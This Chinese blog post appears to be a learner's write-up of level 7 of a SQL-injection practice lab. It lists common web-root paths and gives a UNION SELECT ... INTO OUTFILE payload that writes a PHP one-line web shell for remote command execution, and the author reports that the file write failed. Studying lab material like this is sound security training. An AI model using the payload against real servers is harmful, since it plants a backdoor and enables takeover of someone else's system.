前言

第7关 导出文件GET字符型注入

步骤OK,但是就是不能写入文件,不知是文件夹的问题还是自己操作的问题。但是确实,没有导入成功。

1. 查看闭合,看源码,发现闭合是((‘ ’));

2.查看所在位置:

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

但是在less7中,没有输出信息,所以我们只能盲打:

winserver的iis默认路径是c:/inetpub/wwwroot/,PHPstudy的是F:\phpStudy\PHPTutorial\WWW

linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等,

apache 就/var/www/htm,/var/www/html/htdocs

3.使用into outfile写入一句话木马,然后连接就行了。

?id=')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "路径\\间隔"--+

4.我搭建的物理机,所以没有尝试连菜刀。还有个问题就是不能写入文件,修改了文件夹属性也不行。希望后面几关可以帮助我解开疑惑。

最新文章

  1. mac os 如何加载 Java Native/Shared Library (.jnilib)
  2. UWP开发入门(二十二)——Storyboard和Animation
  3. android——判断网络状态
  4. STM32 使用 FreeRTOS过程记录
  5. centos6.5 tomcat开机启动
  6. ADO.NET笔记——使用通用数据访问
  7. js代码大全(里面啥都有)
  8. WAMP下定义wordpress固定连接出现文章页面404
  9. EMV标准
  10. JAVA的BIT数组
  11. asp.net 一般处理程序session 为 null
  12. Angularjs 实现移动端在线测评效果
  13. 设计模式(二) 策略模式Strategy
  14. postman接口测试系列:接口参数化和参数的传递
  15. Python之协程
  16. 亚马逊 amazon connect(呼叫中心)
  17. 5. 箭头函数_this 指向_es6 常用语法
  18. MongoDB安全使用指引
  19. 【BZOJ5300】[CQOI2018]九连环 (高精度,FFT)
  20. shell编程 之 引号、括号的用法总结

热门文章

  1. 【CF1247F】Tree Factory(构造)
  2. Oracle And子句
  3. 180128-----Java面试题
  4. 设计 4 个线程,其中两个线程每次对 j 增加 1,另外两个线程对 j 每次减少 1。写出程序。
  5. VS 2010内存泄漏检测
  6. h5新标签介绍
  7. centos7部署前后端分离项目的过程
  8. Markdown Memo(memorandum)
  9. iptables List the rules in a chain or all chains
  10. 阶段1 语言基础+高级_1-3-Java语言高级_04-集合_02 泛型_3_定义和使用含有泛型的类